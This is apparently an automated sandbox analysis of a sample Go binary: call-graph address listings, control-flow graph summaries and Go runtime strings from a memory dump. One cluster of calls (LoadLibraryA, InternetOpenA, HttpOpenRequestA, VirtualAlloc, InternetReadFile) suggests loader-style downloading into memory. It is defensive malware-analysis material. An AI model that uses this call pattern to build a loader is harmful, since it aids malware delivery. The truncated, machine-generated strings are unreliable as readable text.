EnumCalendarInfoExW 76510->76518 76519 6b7de0 EnumCalendarInfoExW 76510->76519 76520 6b7c00 EnumCalendarInfoExW 76510->76520 76543 6e9320 EnumCalendarInfoExW 76510->76543 76512->76510 76513 6a82b6 76534 6aa740 76513->76534 76515 6a82c5 76539 6a0ec0 76515->76539 76518->76510 76519->76510 76520->76510 76522->76489 76523->76491 76524->76493 76525->76495 76526->76497 76527->76499 76528->76501 76529->76503 76531 6ae346 76530->76531 76531->76530 76532 68d880 EnumCalendarInfoExW 76531->76532 76533 6ae37a 76532->76533 76533->76513 76537 6aa74a 76534->76537 76535 6aa845 76535->76515 76537->76534 76537->76535 76544 693e40 76537->76544 76551 6e9320 EnumCalendarInfoExW 76537->76551 76540 6a0eca 76539->76540 76540->76539 76552 6ab100 76540->76552 76542 68c6d7 76542->76506 76543->76510 76545 693e4a 76544->76545 76545->76544 76546 6b2fc0 EnumCalendarInfoExW 76545->76546 76547 693e85 76546->76547 76548 693ea5 76547->76548 76549 6b2fc0 EnumCalendarInfoExW 76547->76549 76548->76537 76550 693ee5 76549->76550 76550->76537 76551->76537 76553 6ab106 76552->76553 76553->76552 76554 693e40 EnumCalendarInfoExW 76553->76554 76555 6ab125 76554->76555 76555->76542 76557 68206a 76556->76557 76557->76556 76560 6821db 76557->76560 76565 6ea4e0 EnumCalendarInfoExW 76557->76565 76562 68239e 76560->76562 76566 6ea4e0 EnumCalendarInfoExW 76560->76566 76563 682565 76562->76563 76567 6ea4e0 EnumCalendarInfoExW 76562->76567 76563->76415 76564->76417 76565->76560 76566->76562 76567->76563 76568->76420 76569->76424 76570->76427 76571->76428 76572->76431 76573 6b1040 76574 6b104a 76573->76574 76574->76573 76592 6b2f40 76574->76592 76577 6b115a 76577->76443 76579 6b10bd 76580 6b1154 76579->76580 76596 6ebe00 EnumCalendarInfoExW 76579->76596 76580->76443 76582 6b10fa 76583 6b2f40 EnumCalendarInfoExW 76582->76583 76584 6b113c 76583->76584 76584->76443 76586 6b2d60 EnumCalendarInfoExW 76585->76586 76587 6b1991 76586->76587 76588 6ebe00 EnumCalendarInfoExW 76587->76588 76588->76439 76590 6b2d60 EnumCalendarInfoExW 76589->76590 76591 6b19ed 76590->76591 76591->76573 76593 6b2d60 EnumCalendarInfoExW 76592->76593 76594 6b1085 76593->76594 76594->76577 76595 6b0c20 EnumCalendarInfoExW 76594->76595 76595->76579 76596->76582 76597->76448 76598->76451 76599->76452 76600->76454 76601->76456 76602->76458 76604 6a5a26 76603->76604 76604->76603 76605 6a5a32 76604->76605 76613 6e9320 EnumCalendarInfoExW 76604->76613 76606 6a5dc0 EnumCalendarInfoExW 76605->76606 76608 6a5a39 76606->76608 76608->76479 76609->76479 76610->76478 76611->76479 76612->76479 76613->76604 76614 6bbd00 76615 6bbd13 76614->76615 76620 6bbd80 76615->76620 76619 6bbd74 76621 6bbd8a 76620->76621 76621->76620 76622 6bbda9 76621->76622 76679 6e9320 EnumCalendarInfoExW 76621->76679 76633 6b25c0 76622->76633 76625 6bbde5 76626 6bbdfc 76625->76626 76678 6bbe80 EnumCalendarInfoExW 76625->76678 76628 6bbe1d 76626->76628 76649 6c4ae0 76626->76649 76665 6bffe0 76628->76665 76632 6bbec0 EnumCalendarInfoExW 76632->76619 76647 6b25cf 76633->76647 76635 68bce0 EnumCalendarInfoExW 76635->76647 76636 6b2d60 EnumCalendarInfoExW 76636->76647 76637 6b7ba0 EnumCalendarInfoExW 76637->76647 76639 6b2fc0 EnumCalendarInfoExW 76639->76647 76640 6b2f40 EnumCalendarInfoExW 76640->76647 76641 6b287d 76641->76625 76642 6b8420 EnumCalendarInfoExW 76642->76647 76643 6b8160 EnumCalendarInfoExW 76643->76647 76644 6b82a0 EnumCalendarInfoExW 76644->76647 76645 6b7c00 EnumCalendarInfoExW 76645->76647 76646 6b7de0 EnumCalendarInfoExW 76646->76647 76647->76633 76647->76635 76647->76636 76647->76637 76647->76639 76647->76640 76647->76641 76647->76642 76647->76643 76647->76644 76647->76645 76647->76646 76648 6e9320 EnumCalendarInfoExW 76647->76648 76680 6b3140 76647->76680 76683 68bf40 EnumCalendarInfoExW 76647->76683 76648->76647 76662 6c4aea 76649->76662 76650 68bce0 EnumCalendarInfoExW 76650->76662 76652 6ee9a0 EnumCalendarInfoExW 76652->76662 76654 6f05a0 EnumCalendarInfoExW 76654->76662 76659 6b1280 EnumCalendarInfoExW 76659->76662 76661 6c4640 EnumCalendarInfoExW 76661->76662 76662->76649 76662->76650 76662->76652 76662->76654 76662->76659 76662->76661 76664 68bf40 EnumCalendarInfoExW 76662->76664 76684 6c46a0 EnumCalendarInfoExW 76662->76684 76685 6d4d60 EnumCalendarInfoExW 76662->76685 76686 68c480 EnumCalendarInfoExW 76662->76686 76687 6b0560 EnumCalendarInfoExW 76662->76687 76688 69fcc0 EnumCalendarInfoExW 76662->76688 76689 6c5060 EnumCalendarInfoExW 76662->76689 76690 696c20 EnumCalendarInfoExW 76662->76690 76691 6c5460 EnumCalendarInfoExW 76662->76691 76664->76662 76676 6bffea 76665->76676 76667 6e9320 EnumCalendarInfoExW 76667->76676 76671 68bce0 EnumCalendarInfoExW 76671->76676 76672 6c0217 76673 6be0a0 EnumCalendarInfoExW 76672->76673 76675 6bbd6a 76673->76675 76675->76632 76676->76665 76676->76667 76676->76671 76676->76672 76677 68bf40 EnumCalendarInfoExW 76676->76677 76692 6bdc60 76676->76692 76706 6bfc20 76676->76706 76710 6be0a0 76676->76710 76720 6bdee0 EnumCalendarInfoExW 76676->76720 76721 6be260 EnumCalendarInfoExW 76676->76721 76677->76676 76678->76626 76679->76621 76681 6b2d60 EnumCalendarInfoExW 76680->76681 76682 6b3196 76681->76682 76682->76647 76683->76647 76684->76662 76685->76662 76686->76662 76687->76662 76688->76662 76689->76662 76690->76662 76691->76662 76698 6bdc6a 76692->76698 76697 6bdd0a 76697->76676 76698->76692 76698->76697 76699 6b8420 EnumCalendarInfoExW 76698->76699 76700 6b7c00 EnumCalendarInfoExW 76698->76700 76701 6b7ba0 EnumCalendarInfoExW 76698->76701 76702 6b83a0 EnumCalendarInfoExW 76698->76702 76703 6b8160 EnumCalendarInfoExW 76698->76703 76704 6b7de0 EnumCalendarInfoExW 76698->76704 76705 6e9320 EnumCalendarInfoExW 76698->76705 76722 6c4460 76698->76722 76728 6bd8e0 76698->76728 76755 6c4640 EnumCalendarInfoExW 76698->76755 76756 68c0c0 EnumCalendarInfoExW 76698->76756 76699->76698 76700->76698 76701->76698 76702->76698 76703->76698 76704->76698 76705->76698 76707 6bfc26 76706->76707 76707->76706 76708 6e9320 EnumCalendarInfoExW 76707->76708 76709 6bfc59 76707->76709 76708->76707 76709->76676 76711 6be0aa 76710->76711 76711->76710 76713 6be0e5 76711->76713 76767 6adc80 EnumCalendarInfoExW 76711->76767 76768 6bab80 EnumCalendarInfoExW 76713->76768 76715 6be148 76717 6be1a5 76715->76717 76769 6b3380 EnumCalendarInfoExW 76715->76769 76718 6be1d2 76717->76718 76770 6dca80 EnumCalendarInfoExW 76717->76770 76718->76676 76720->76676 76721->76676 76723 6c4466 76722->76723 76723->76722 76727 6c449f 76723->76727 76757 6dc1e0 EnumCalendarInfoExW 76723->76757 76726 6c44df 76726->76698 76758 6c4500 EnumCalendarInfoExW 76727->76758 76729 6bd8ea 76728->76729 76729->76728 76730 68bce0 EnumCalendarInfoExW 76729->76730 76731 6bd99b 76729->76731 76732 6bda85 76730->76732 76731->76698 76734 6bda93 76732->76734 76736 6bdbcd 76732->76736 76733 6bdaf4 76739 6bdbab 76733->76739 76740 6bdb06 76733->76740 76734->76733 76759 68c040 EnumCalendarInfoExW 76734->76759 76735 6bdc25 76766 68bf40 EnumCalendarInfoExW 76735->76766 76736->76735 76765 68c040 EnumCalendarInfoExW 76736->76765 76764 68bf40 EnumCalendarInfoExW 76739->76764 76742 6bdb4b 76740->76742 76744 6bdb25 76740->76744 76741 6bdc33 76741->76698 76761 6c6020 EnumCalendarInfoExW 76742->76761 76760 68bf40 EnumCalendarInfoExW 76744->76760 76745 6bdbb9 76745->76698 76749 6bdb85 76762 68bf40 EnumCalendarInfoExW 76749->76762 76750 6bdb33 76750->76698 76752 6bdb93 76753 6bdba5 76752->76753 76763 6bfbc0 EnumCalendarInfoExW 76752->76763 76753->76698 76755->76698 76756->76698 76757->76727 76758->76726 76759->76733 76760->76750 76761->76749 76762->76752 76763->76753 76764->76745 76765->76735 76766->76741 76767->76713 76768->76715 76769->76717 76770->76718 76771 6b1680 76772 6b168a 76771->76772 76772->76771 76793 6b0d80 76772->76793 76774 6b16bd 76803 6cb8c0 76774->76803 76782 6b16d6 76850 6b0ce0 EnumCalendarInfoExW 76782->76850 76784 6b16e5 76835 6b15a0 76784->76835 76786 6b16ea 76842 6b1180 76786->76842 76788 6b16ef 76789 6b2e40 EnumCalendarInfoExW 76788->76789 76790 6b1725 76789->76790 76791 6b2ec0 EnumCalendarInfoExW 76790->76791 76792 6b1765 76791->76792 76801 6b0d8a 76793->76801 76794 6b0c20 EnumCalendarInfoExW 76794->76801 76795 6b2f40 EnumCalendarInfoExW 76795->76801 76796 6b0f49 76851 6b0c20 EnumCalendarInfoExW 76796->76851 76799 6b0f65 76852 6b0c20 EnumCalendarInfoExW 76799->76852 76800 6b0fa5 76800->76774 76801->76793 76801->76794 76801->76795 76801->76796 76802 6e9320 EnumCalendarInfoExW 76801->76802 76802->76801 76804 6cb8ca 76803->76804 76804->76803 76805 6b2d60 EnumCalendarInfoExW 76804->76805 76806 6cb8ea 76805->76806 76807 6b2e40 EnumCalendarInfoExW 76806->76807 76808 6cb905 76807->76808 76809 6b2ec0 EnumCalendarInfoExW 76808->76809 76810 6cb945 76809->76810 76811 6b2e40 EnumCalendarInfoExW 76810->76811 76812 6b16c5 76811->76812 76813 6cba20 76812->76813 76814 6cba2a 76813->76814 76814->76813 76815 6b2ec0 EnumCalendarInfoExW 76814->76815 76816 6cba57 76815->76816 76817 6b2ec0 EnumCalendarInfoExW 76816->76817 76818 6cba8e 76817->76818 76819 6b2ec0 EnumCalendarInfoExW 76818->76819 76820 6b16ca 76819->76820 76821 6b1340 76820->76821 76827 6b134a 76821->76827 76822 6b2fc0 EnumCalendarInfoExW 76822->76827 76823 6b1397 76824 6b2e40 EnumCalendarInfoExW 76823->76824 76826 6b13c5 76824->76826 76825 6b2f40 EnumCalendarInfoExW 76825->76827 76849 6b1280 EnumCalendarInfoExW 76826->76849 76827->76821 76827->76822 76827->76823 76827->76825 76827->76826 76828 6b0c20 EnumCalendarInfoExW 76827->76828 76829 6b7ba0 EnumCalendarInfoExW 76827->76829 76830 6b8420 EnumCalendarInfoExW 76827->76830 76831 6e9320 EnumCalendarInfoExW 76827->76831 76832 6b8160 EnumCalendarInfoExW 76827->76832 76833 6b7de0 EnumCalendarInfoExW 76827->76833 76834 6b7c00 EnumCalendarInfoExW 76827->76834 76828->76827 76829->76827 76830->76827 76831->76827 76832->76827 76833->76827 76834->76827 76836 6b15b2 76835->76836 76836->76835 76837 6b2e40 EnumCalendarInfoExW 76836->76837 76838 6b1605 76837->76838 76839 6b1638 76838->76839 76840 6b2d60 EnumCalendarInfoExW 76838->76840 76839->76786 76841 6b1659 76840->76841 76841->76786 76843 6b118a 76842->76843 76843->76842 76844 6b2f40 EnumCalendarInfoExW 76843->76844 76846 6b11d1 76844->76846 76845 6b2e40 EnumCalendarInfoExW 76847 6b121d 76845->76847 76846->76845 76848 6b126b 76846->76848 76847->76788 76848->76788 76849->76782 76850->76784 76851->76799 76852->76800 76853 6ce300 76895 6ce312 76853->76895 76854 6e9320 EnumCalendarInfoExW 76854->76895 76855 6b7ba0 EnumCalendarInfoExW 76855->76895 76857 6ce686 76858 6ce69b 76857->76858 76915 6cefc0 EnumCalendarInfoExW 76857->76915 76863 6ce6be 76858->76863 76916 6c08e0 EnumCalendarInfoExW 76858->76916 76859 6ce6d1 76865 6ce70f 76859->76865 76918 6d2760 EnumCalendarInfoExW 76859->76918 76860 6b83a0 EnumCalendarInfoExW 76860->76895 76862 6ce7e2 76896 6ce82a 76862->76896 76921 6b7ba0 EnumCalendarInfoExW 76862->76921 76917 6c04e0 EnumCalendarInfoExW 76863->76917 76865->76862 76866 6ce76d 76865->76866 76919 6bab80 EnumCalendarInfoExW 76866->76919 76871 6ce789 76898 6cdec0 76871->76898 76872 6ce7f4 76922 6b8420 EnumCalendarInfoExW 76872->76922 76876 6b8420 EnumCalendarInfoExW 76876->76896 76877 6ce805 76923 6b8160 EnumCalendarInfoExW 76877->76923 76878 6b8420 EnumCalendarInfoExW 76878->76895 76883 6ce811 76924 6b8420 EnumCalendarInfoExW 76883->76924 76884 6ce7b2 76886 6ce825 76925 6b7c00 EnumCalendarInfoExW 76886->76925 76887 6b7c00 EnumCalendarInfoExW 76887->76896 76889 6b7ba0 EnumCalendarInfoExW 76889->76896 76890 6b7de0 EnumCalendarInfoExW 76890->76895 76891 6b82a0 EnumCalendarInfoExW 76891->76895 76892 6b82a0 EnumCalendarInfoExW 76892->76896 76893 6d7e60 EnumCalendarInfoExW 76893->76895 76894 6b7c00 EnumCalendarInfoExW 76894->76895 76895->76853 76895->76854 76895->76855 76895->76857 76895->76859 76895->76860 76895->76878 76895->76890 76895->76891 76895->76893 76895->76894 76928 6b8160 EnumCalendarInfoExW 76895->76928 76929 6d1ca0 EnumCalendarInfoExW 76895->76929 76896->76876 76896->76887 76896->76889 76896->76892 76926 6e9320 EnumCalendarInfoExW 76896->76926 76927 6b8160 EnumCalendarInfoExW 76896->76927 76899 6cdecf 76898->76899 76899->76898 76900 6cdef2 76899->76900 76901 6e9320 EnumCalendarInfoExW 76899->76901 76902 6cd0c0 EnumCalendarInfoExW 76900->76902 76901->76899 76903 6cdfa5 76902->76903 76906 6ce014 76903->76906 76907 6ce04a 76903->76907 76934 6e9320 EnumCalendarInfoExW 76903->76934 76935 6cdd60 EnumCalendarInfoExW 76906->76935 76930 6d6440 EnumCalendarInfoExW 76907->76930 76911 6ce18d 76913 6ce1b7 76911->76913 76931 6cd9c0 EnumCalendarInfoExW 76911->76931 76932 6d6a80 EnumCalendarInfoExW 76911->76932 76912 6ce1ed 76920 6bab80 EnumCalendarInfoExW 76912->76920 76933 6cd440 EnumCalendarInfoExW 76913->76933 76915->76858 76916->76863 76917->76859 76918->76865 76919->76871 76920->76884 76921->76872 76922->76877 76923->76883 76924->76886 76925->76896 76926->76896 76927->76896 76928->76895 76929->76895 76930->76911 76931->76911 76932->76911 76933->76912 76934->76906 76935->76907 76936 6c4f80 76937 6c4f8a 76936->76937 76937->76936 76938 6c4fe7 76937->76938 76942 6b30c0 76937->76942 76940 6b2ec0 EnumCalendarInfoExW 76938->76940 76941 6c503a 76940->76941 76943 6b2d60 EnumCalendarInfoExW 76942->76943 76944 6b3116 76943->76944 76944->76938 76945 6ee920 76946 6ee94f 76945->76946 76947 6ee954 76945->76947 76968 6b9440 EnumCalendarInfoExW 76946->76968 76954 6c02c0 76947->76954 76955 6c02ca 76954->76955 76955->76954 76956 6c0328 76955->76956 76970 6dcd60 EnumCalendarInfoExW 76955->76970 76971 6bab80 EnumCalendarInfoExW 76956->76971 76959 6c04a6 76960 6bffe0 EnumCalendarInfoExW 76959->76960 76961 6c04ab 76960->76961 76969 6b9480 EnumCalendarInfoExW 76961->76969 76962 6c033c 76962->76959 76972 6bab80 EnumCalendarInfoExW 76962->76972 76964 6c043a 76965 6c0459 76964->76965 76973 6dce80 EnumCalendarInfoExW 76964->76973 76967 6be0a0 EnumCalendarInfoExW 76965->76967 76967->76959 76970->76956 76971->76962 76972->76964 76973->76965 76974 6ee700 76975 6ee720 76974->76975 76978 6f55a0 76975->76978 76977 6ee869 76981 6c2320 76978->76981 76983 6c2326 76981->76983 76982 6ee9a0 EnumCalendarInfoExW 76984 6c235f 76982->76984 76983->76981 76983->76982 76984->76977 76985 6bd759 76986 6bd772 76985->76986 76987 6bd764 76985->76987 76988 68bce0 EnumCalendarInfoExW 76987->76988 76988->76986 76989 21551b0015a HttpOpenRequestA 76990 21551b00181 76989->76990 76991 21551b0037a VirtualAlloc 76990->76991 76992 21551b00383 InternetReadFile 76990->76992 76993 21551b003ac 76990->76993 76991->76992 76992->76990 76994 21551c17bac 76995 21551c17bd4 _callnewh 76994->76995 76996 21551c17bc1 76994->76996 76996->76995 76998 21551c0fbcc RtlFreeHeap _getptd_noexit 76996->76998 76998->76995 76999 21551b00101 77000 21551b0010e LoadLibraryA InternetOpenA 76999->77000 77001 21551b001ce 77000->77001 77002 6bd095 77003 6bd167 77002->77003 77010 6bd060 77002->77010 77014 6bd1e0 77003->77014 77005 6bd16c 77006 68bce0 EnumCalendarInfoExW 77006->77010 77007 6bd0f2 77009 6bd129 77007->77009 77031 68c040 EnumCalendarInfoExW 77007->77031 77032 68bf40 EnumCalendarInfoExW 77009->77032 77010->77002 77010->77003 77010->77006 77010->77007 77033 6e9320 EnumCalendarInfoExW 77010->77033 77013 6bd137 77015 6bd1ea 77014->77015 77015->77014 77016 6bd283 77015->77016 77017 6bd21c 77015->77017 77052 6e9320 EnumCalendarInfoExW 77015->77052 77050 6c8e60 EnumCalendarInfoExW 77016->77050 77048 6c8e60 EnumCalendarInfoExW 77017->77048 77021 6bd294 77034 6b2420 77021->77034 77022 6bd245 77024 6f05a0 EnumCalendarInfoExW 77022->77024 77027 6bd25f 77024->77027 77049 6c8f80 EnumCalendarInfoExW 77027->77049 77028 6bd2aa 77028->77005 77030 6bd27d 77030->77005 77031->77009 77032->77013 77033->77010 77035 6b30c0 EnumCalendarInfoExW 77034->77035 77036 6b2455 77035->77036 77037 6b2471 77036->77037 77045 6b249e 77036->77045 77038 6b2e40 EnumCalendarInfoExW 77037->77038 77039 6b2486 77038->77039 77051 6c8f80 EnumCalendarInfoExW 77039->77051 77040 68bce0 EnumCalendarInfoExW 77040->77045 77043 6b8420 EnumCalendarInfoExW 77043->77045 77045->77040 77045->77043 77053 6b7ba0 EnumCalendarInfoExW 77045->77053 77054 6b8240 EnumCalendarInfoExW 77045->77054 77055 6b8160 EnumCalendarInfoExW 77045->77055 77056 6b7c00 EnumCalendarInfoExW 77045->77056 77057 6e9320 EnumCalendarInfoExW 77045->77057 77048->77022 77049->77030 77050->77021 77051->77028 77052->77015 77053->77045 77054->77045 77055->77045 77056->77045 77057->77045

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 281 68c980-68c989 282 68c98f-68c9d2 281->282 283 68d106-68d133 call 6eeac0 281->283 284 68c9db-68c9f9 call 68dc20 282->284 285 68c9d4-68c9d6 282->285 283->281 295 68c9fb-68ca20 284->295 296 68ca25 284->296 287 68cda7-68cdad 285->287 291 68ced2-68cee1 287->291 292 68cdb3-68cdd4 287->292 297 68cee4-68cee7 291->297 293 68cde5-68ce07 292->293 294 68cdd6-68cde3 292->294 299 68ce09-68ce0c 293->299 300 68ce0e-68ce20 call 693e40 293->300 298 68ce61-68ce67 294->298 295->287 301 68ca2a-68caa3 296->301 302 68cfab-68cfb5 297->302 303 68ceed-68cf03 call 68d140 297->303 305 68ce69-68ce6c 298->305 306 68cebe-68ced0 298->306 299->298 312 68ce25-68ce59 300->312 318 68caa9-68cab4 301->318 319 68cd05-68cd10 301->319 307 68cfd0-68cfe9 302->307 308 68cfb7-68cfce 302->308 320 68cf09-68cfa1 call 696800 * 2 303->320 321 68d045-68d051 303->321 313 68ce72-68ceb9 call 693d60 305->313 314 68cd76-68cda4 305->314 306->297 316 68cffa-68d026 307->316 317 68cfeb-68cff8 307->317 315 68d02a-68d02d 308->315 312->298 313->314 314->287 323 68d02f-68d036 315->323 324 68d065-68d105 call 6b7ba0 call 6b8420 call 6b82a0 call 6b8420 call 6b82a0 call 6b8420 * 2 call 6b7de0 call 6b7c00 call 6e9320 315->324 316->315 317->315 325 68cd69-68cd71 call 6f0dc0 318->325 326 68caba-68caca 318->326 320->302 331 68d038-68d040 323->331 332 68d052-68d060 call 6e9320 323->332 324->283 325->314 333 68cad0-68cb05 call 6b2fc0 326->333 334 68cb77-68cb88 326->334 331->301 332->324 341 68cb0a-68cb24 333->341 339 68cb8e-68cbbb call 68dc20 334->339 340 68cd47-68cd53 call 6e9320 334->340 355 68cbdc-68cbe7 339->355 356 68cbbd-68cbd6 call 68d880 339->356 346 68cd58-68cd64 call 6e9320 340->346 341->346 347 68cb2a-68cb39 341->347 346->325 351 68cb3b-68cb3c 347->351 352 68cb3e 347->352 357 68cb3f-68cb6d 351->357 352->357 360 68cbed-68cc07 355->360 361 68ccee-68ccfb 355->361 356->355 371 68cd36-68cd42 call 6e9320 356->371 357->334 364 68cc0d-68cc19 360->364 365 68ccb6-68cccb 360->365 361->319 366 68cc1b 364->366 367 68cc22-68cc43 call 68d880 364->367 369 68cd1c-68cd20 call 6f0e20 365->369 370 68cccd-68ccd7 365->370 366->367 380 68cd25-68cd31 call 6e9320 367->380 382 68cc49-68cc8e 367->382 369->380 376 68ccd9-68cce9 370->376 377 68cd11-68cd17 call 6f0da0 370->377 371->340 377->369 380->371 385 68cc90-68cc99 call 6f1760 382->385 386 68cca1-68ccae 382->386 385->386 386->365
                      Strings
                      • ) not in usable address space: runtime: cannot allocate memorycheckmark found unmarked objectruntime: failed to commit pages/memory/classes/heap/free:bytes/memory/classes/os-stacks:bytespacer: sweep done at heap size non in-use span in unswept listruntime.Pinn, xrefs: 0068D0C5
                      • out of memory allocating allArenas/memory/classes/heap/objects:bytesruntime.SetFinalizer: cannot pass too many pages allocated in chunk?mspan.ensureSwept: m is not lockedruntime: source value is too largeVirtualQuery for stack base failedforEachP: sched.safePo, xrefs: 0068CD25
                      • , xrefs: 0068D00F
                      • out of memory allocating heap arena metadata/cpu/classes/scavenge/background:cpu-secondsruntime: unexpected metric registration for gcmarknewobject called while doing checkmarkactive sweepers found at start of mark phaseno P available, write barriers are forbi, xrefs: 0068CD36
                      • memory reservation exceeds address space limittried to park scavenger from another goroutinereleased less than one physical page of memory (bad use of unsafe.Pointer? try -d=checkptr)sysGrow bounds not aligned to pallocChunkBytesruntime: failed to create new , xrefs: 0068D0F2
                      • base outside usable address spaceruntime: memory allocated by OS [misrounded allocation in sysAllocconcurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-c, xrefs: 0068CFF1
                      • arena already initialized to unused region of span bytes failed with errno=runtime: VirtualAlloc of /sched/gomaxprocs:threadsremaining pointer buffersslice bounds out of range_cgo_thread_start missingallgadd: bad status Gidleruntime: program exceeds startm: p , xrefs: 0068CD47
                      • out of memory allocating heap arena map/cpu/classes/gc/mark/assist:cpu-seconds/cpu/classes/scavenge/total:cpu-seconds/memory/classes/profiling/buckets:bytesmspan.sweep: bad span state after sweepruntime: blocked write on free polldescPowerRegisterSuspendResume, xrefs: 0068CD58
                      • region exceeds uintptr range/gc/heap/frees-by-size:bytes/gc/heap/tiny/allocs:objects/sched/goroutines:goroutinesgcBgMarkWorker: mode not setmspan.sweep: m is not lockedfound pointer to free objectmheap.freeSpanLocked - span runtime.semasleep unexpectedfatal: m, xrefs: 0068CFC7
                      • end outside usable address spaceGCProg for type that isn't largeruntime: failed to release pagesruntime: fixalloc size too largeinvalid limiter event type foundscanstack: goroutine not stoppedscavenger state is already wiredsweep increased allocation countremo, xrefs: 0068D01F
                      Memory Dump Source
                      • Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_test5.jbxd
                      Similarity
                      • API ID:
                      • String ID: $) not in usable address space: runtime: cannot allocate memorycheckmark found unmarked objectruntime: failed to commit pages/memory/classes/heap/free:bytes/memory/classes/os-stacks:bytespacer: sweep done at heap size non in-use span in unswept listruntime.Pinn$arena already initialized to unused region of span bytes failed with errno=runtime: VirtualAlloc of /sched/gomaxprocs:threadsremaining pointer buffersslice bounds out of range_cgo_thread_start missingallgadd: bad status Gidleruntime: program exceeds startm: p $base outside usable address spaceruntime: memory allocated by OS [misrounded allocation in sysAllocconcurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-c$end outside usable address spaceGCProg for type that isn't largeruntime: failed to release pagesruntime: fixalloc size too largeinvalid limiter event type foundscanstack: goroutine not stoppedscavenger state is already wiredsweep increased allocation countremo$memory reservation exceeds address space limittried to park scavenger from another goroutinereleased less than one physical page of memory (bad use of unsafe.Pointer? try -d=checkptr)sysGrow bounds not aligned to pallocChunkBytesruntime: failed to create new $out of memory allocating allArenas/memory/classes/heap/objects:bytesruntime.SetFinalizer: cannot pass too many pages allocated in chunk?mspan.ensureSwept: m is not lockedruntime: source value is too largeVirtualQuery for stack base failedforEachP: sched.safePo$out of memory allocating heap arena map/cpu/classes/gc/mark/assist:cpu-seconds/cpu/classes/scavenge/total:cpu-seconds/memory/classes/profiling/buckets:bytesmspan.sweep: bad span state after sweepruntime: blocked write on free polldescPowerRegisterSuspendResume$out of memory allocating heap arena metadata/cpu/classes/scavenge/background:cpu-secondsruntime: unexpected metric registration for gcmarknewobject called while doing checkmarkactive sweepers found at start of mark phaseno P available, write barriers are forbi$region exceeds uintptr range/gc/heap/frees-by-size:bytes/gc/heap/tiny/allocs:objects/sched/goroutines:goroutinesgcBgMarkWorker: mode not setmspan.sweep: m is not lockedfound pointer to free objectmheap.freeSpanLocked - span runtime.semasleep unexpectedfatal: m
                      • API String ID: 0-3600667164
                      • Opcode ID: 2c8592fce67afc5a58f5864966229cd646a48f7a9a0a7ec761bace7ce94c4b03
                      • Instruction ID: 231cb8ac6cbf5057f376ff992f29b284c0b5f6297b3f5162ba44f51b5e3b565b
                      • Opcode Fuzzy Hash: 2c8592fce67afc5a58f5864966229cd646a48f7a9a0a7ec761bace7ce94c4b03
                      • Instruction Fuzzy Hash: FB029972209B8481DBA0EB56F4407AAA766F789BA0F448226EFDD57799CF3CC484C750

                      Control-flow Graph

                      Strings
                      • runtime: NtCreateWaitCompletionPacket failed; errno=casfrom_Gscanstatus: gp->status is not in scan statenon-concurrent sweep failed to drain all sweep queuesruntime: NtCancelWaitCompletionPacket failed; errno= exited a goroutine internally locked to the OS thr, xrefs: 006B2997
                      • bad g0 stackself-preempt [recovered]bad recoverybad g statusentersyscallwirep: p->m=) p->status=releasep: m= sysmonwait= preemptoff=cas64 failed m->gsignal=-byte limitruntime: sp=abi mismatchwrong timers152587890625762939453125invalid slothost is downillegal , xrefs: 006B290A
                      • CreateWaitableTimerEx when creating timer failedruntime.preemptM: duplicatehandle failed; errno=runtime: malformed profBuf buffer - invalid sizeattempt to trace invalid or unsupported P statusruntime: waitforsingleobject wait_failed; errno=strconv: illegal App, xrefs: 006B2A1F, 006B2A7F
                      • NtCreateWaitCompletionPacket failedfindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=1776356839400250464677810668945312588817841970012523233890533447265625ryuFtoaFixed32 , xrefs: 006B29BF
                      • runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zerocannot send after transport endpoint shutdownreflect: internal error: invalid method indexcontext: internal error: missing ca, xrefs: 006B29F7, 006B2A57
                      • VirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workentersyscallblock inconsistent bp entersyscallblock inconsistent sp runtime: g is running but p is notinvalid timer channel: no capacity3552713678800500929355, xrefs: 006B296F
                      • 0, xrefs: 006B281A
                      • runtime.minit: duplicatehandle failed_cgo_notify_runtime_init_done missingstartTheWorld: inconsistent mp->nextpruntime: unexpected SPWRITE function all goroutines are asleep - deadlock!2220446049250313080847263336181640625cannot exec a shared library directlyv, xrefs: 006B2ADF
                      • runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zerocannot send after transport endpoint shutdownreflect: internal error: invalid me, xrefs: 006B2AB7
                      • runtime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnableruntime: bad notifyList size - sync=accessed data from freed user arena runtime:, xrefs: 006B2947
                      Memory Dump Source
